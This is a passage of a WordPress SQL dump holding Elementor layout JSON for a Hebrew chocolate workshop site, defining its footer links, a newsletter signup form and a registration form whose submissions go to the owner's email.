invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1137,232,'_elementor_version','0.4'),(1138,232,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(1140,233,'_elementor_template_type','footer'),(1141,233,'_elementor_edit_mode','builder'),(1142,233,'_wp_page_template','default'),(1143,233,'_elementor_data','[{\"id\":\"4a55fbba\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"4c2a586d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2838f23b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2e4e8641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2bae734c\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5b29d96\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"3003b83\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"1d764f83\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"51a1031b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"98f4544\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"4a7f6aed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"5118f384\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66fbeda3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"668f1337\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"\\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4?\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"56e06b83\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#2d2d2d\"},\"elements\":[{\"id\":\"7bbb4fd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"7af00eb1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05dc \\u05d4\\u05d6\\u05db\\u05d5\\u05d9\\u05d5\\u05ea \\u05e9\\u05de\\u05d5\\u05e8\\u05d5\\u05ea 2018 (c) - \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U<\\/p>\",\"text_color\":\"#ffffff\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1144,233,'_elementor_version','0.4'),(1145,233,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(1149,234,'_wp_page_template','elementor_header_footer'),(1150,234,'_elementor_edit_mode','builder'),(1151,234,'_elementor_template_type','post'),(1152,234,'_elementor_data','[{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"label_typography_typography\":\"custom\",\"label_typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc 